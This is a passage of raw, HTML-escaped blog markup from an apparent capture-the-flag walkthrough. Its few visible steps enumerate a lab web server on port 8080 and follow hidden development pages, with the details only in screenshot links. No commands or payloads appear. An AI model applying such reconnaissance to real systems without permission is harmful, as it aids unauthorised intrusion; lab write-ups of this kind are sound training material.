/&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to the web server at port 8080 we learn about &lt;b&gt;html_pages&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaV8WQq5LJd7sLiTFs3pwH31dqNR6D3JnM5usiCicFCr1xm5nJ-auw98t0iBk0iLZykf81tHE0tRZIJwomDvtgo1L_meUFUdq1WlUGXEtcAVPJ86i40hDqZmcP1TuQBzb6pckjWQtnQATs/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;405&quot; data-original-width=&quot;1084&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaV8WQq5LJd7sLiTFs3pwH31dqNR6D3JnM5usiCicFCr1xm5nJ-auw98t0iBk0iLZykf81tHE0tRZIJwomDvtgo1L_meUFUdq1WlUGXEtcAVPJ86i40hDqZmcP1TuQBzb6pckjWQtnQATs/s16000/screenshot.8.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing &lt;b&gt;html_pages&lt;/b&gt;&amp;nbsp;there is a Linux directory list:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;float: left;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIfG8aRbxwhYWjJUhXeX5hbRaeb9bmG2tVRIhyGrYgZDZNbFJ_BSwUPKBbEdi0AtesGZmP_76ovGoo9PWmh8ZcYyrelh2SKkbqBfChxrc2o2cfCevIZ_YcVx4OalWp9LFZE7zhD_3A_BH/&quot; style=&quot;clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;356&quot; data-original-width=&quot;685&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIfG8aRbxwhYWjJUhXeX5hbRaeb9bmG2tVRIhyGrYgZDZNbFJ_BSwUPKBbEdi0AtesGZmP_76ovGoo9PWmh8ZcYyrelh2SKkbqBfChxrc2o2cfCevIZ_YcVx4OalWp9LFZE7zhD_3A_BH/s16000/screenshot.10.jpg&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Most of those web pages are just distractions of the hacking process, however &lt;b&gt;development.html&lt;/b&gt; holds interesting information:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtpIpIt_jinEuTLvv7b5gizu5QehHyy9IWmkT14VpHN_MasTnSDNafKP7FJeb5TtvRiCy_n3Y7fDnjpGL8mM-UwD-1lDwrMoK3jp9Btsvm5IVLO3ubWb7pNGXKjIb9JfOSwCRwX7C6La6-/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;551&quot; data-original-width=&quot;959&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtpIpIt_jinEuTLvv7b5gizu5QehHyy9IWmkT14VpHN_MasTnSDNafKP7FJeb5TtvRiCy_n3Y7fDnjpGL8mM-UwD-1lDwrMoK3jp9Btsvm5IVLO3ubWb7pNGXKjIb9JfOSwCRwX7C6La6-/s16000/screenshot.16.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Viewing the source it seems that &lt;b&gt;/developmentsecretpage&lt;/b&gt; is the right way to follow:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaxLmqMcUwU6Qy9eHat-_8qRAvC5aWEgDftMC0JDx2FrvAII6prcu00c0zkldS52kW6ZoCzg2EWKBHRwJGxwrlrDO_8ZNhzUe6siTUGKm_4XF7MnUFMRJzp-aw_lk443hmkALV-8Xa6yVu/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;412&quot; data-original-width=&quot;659&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaxLmqMcUwU6Qy9eHat-_8qRAvC5aWEgDftMC0JDx2FrvAII6prcu00c0zkldS52kW6ZoCzg2EWKBHRwJGxwrlrDO_8ZNhzUe6siTUGKm_4XF7MnUFMRJzp-aw_lk443hmkALV-8Xa6yVu/s16000/screenshot.19.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to &lt;b&gt;/developmentsecretpage&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7rqyNa9yXWRcj2iYqlPxQvG5gSLJ9xFhPa2RKMCfYW4DR0zpwm62NUH7ZsSMSrRdcqeAejGpzwmRxSVspFJb0m4cou5eKb1Rkh7m7rYmKYPRCweP5o5e5roWk8RiDVJzQGwGlIZ9-t8Q6/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;307&quot; data-original-width=&quot;830&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7rqyNa9yXWRcj2iYqlPxQvG5gSLJ9xFhPa2RKMCfYW4DR0zpwm62NUH7ZsSMSrRdcqeAejGpzwmRxSVspFJb0m4cou5eKb1Rkh7m7rYmKYPRCweP5o5e5roWk8RiDVJzQGwGlIZ9-t8Q6/s16000/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;Clicking &lt;b&gt;Patrick&#39;s&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNgCaKqIcQIt7dHFbJd89s9sOgnAtD85JdjInu6kZQuTdlAKFJsStUViWi8_LDSdVcyeTcJ8tUkJW5FdNEO9gW8NPYtvyNOTdA7xSUykDxV5c1KDrDMsC2hS8lIb9rfbz8vBb-36Lpq3Gq/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;566&quot; data-original-width=&quot;875&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNgCaKqIcQIt7dHFbJd89s9sOgnAtD85JdjInu6kZQuTdlAKFJsStUViWi8_LDSdVcyeTcJ8tUkJW5FdNEO9gW8NPYtvyNOTdA7xSUykDxV5c1KDrDMsC2hS8lIb9rfbz8vBb-36Lpq3Gq/s16000/screenshot.21.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 